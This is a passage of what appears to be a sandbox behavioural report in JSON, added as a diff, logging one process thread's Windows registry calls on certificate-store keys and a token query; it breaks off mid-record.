+ "repeated": 1, + "id": 1925 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1926 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1927 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1928 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1929 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1930 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1931 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1932 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1933 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1934 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1935 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1936 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1937 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\trust\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\trust\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1938 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1939 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\trust" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1940 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1941 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1942 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\trust" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1943 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Trust\\" + } + ], + "repeated": 0, + "id": 1944 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000568" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000564" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Trust\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1945 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000568" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1946 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000568" + } + ], + "repeated": 0, + "id": 1947 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000568" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000564" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Trust\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1948 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000568" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1949 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000568" + } + ], + "repeated": 0, + "id": 1950 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000568" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000564" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Trust\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1951 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000568" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1952 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000568" + } + ], + "repeated": 0, + "id": 1953 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1954 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000574" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000534" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates" + } + ], + "repeated": 0, + "id": 1955 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000574" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1956 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000574" + } + ], + "repeated": 0, + "id": 1957 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000574" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000534" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\CRLs" + } + ], + "repeated": 0, + "id": 1958 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000574" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1959 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000574" + } + ], + "repeated": 0, + "id": 1960 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000574" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000534" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\CTLs" + } + ], + "repeated": 0, + "id": 1961 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000574" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1962 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000574" + } + ], + "repeated": 0, + "id": 1963 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000574" + } + ], + "repeated": 0, + "id": 1964 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x08\\xf2[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x1b\"\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v.\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00$\\xf2[\\x050\\xf3[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xa0\\xf2[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xf0\\xf2[\\x05\\xd3\"\\xd6\\xfa\\xd4\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xec\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s,\\xf3[\\x05l\\xf5L\\xf3\\xec\\xf2\\xdc\\xf2P\\xf3\\x00\\x00<\\xff\\x00\\x00l\\xf5[\\x05L\\xf3[\\x05P\\xf3[\\x05\\x00\\x00\\x00\\x00\\x00\\xf3[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00,\\xf3[\\x05" + } + ], + "repeated": 0, + "id": 1965 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000574" + } + ], + "repeated": 0, + "id": 1966 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1967 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000574" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1968 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000578" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000574" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 1969 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000578" + }, + { + "name": "ValueName", + "value": "Certificates" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots\\Certificates" + } + ], + "repeated": 0, + "id": 1970 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000578" + }, + { + "name": "ValueName", + "value": "Certificates" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": 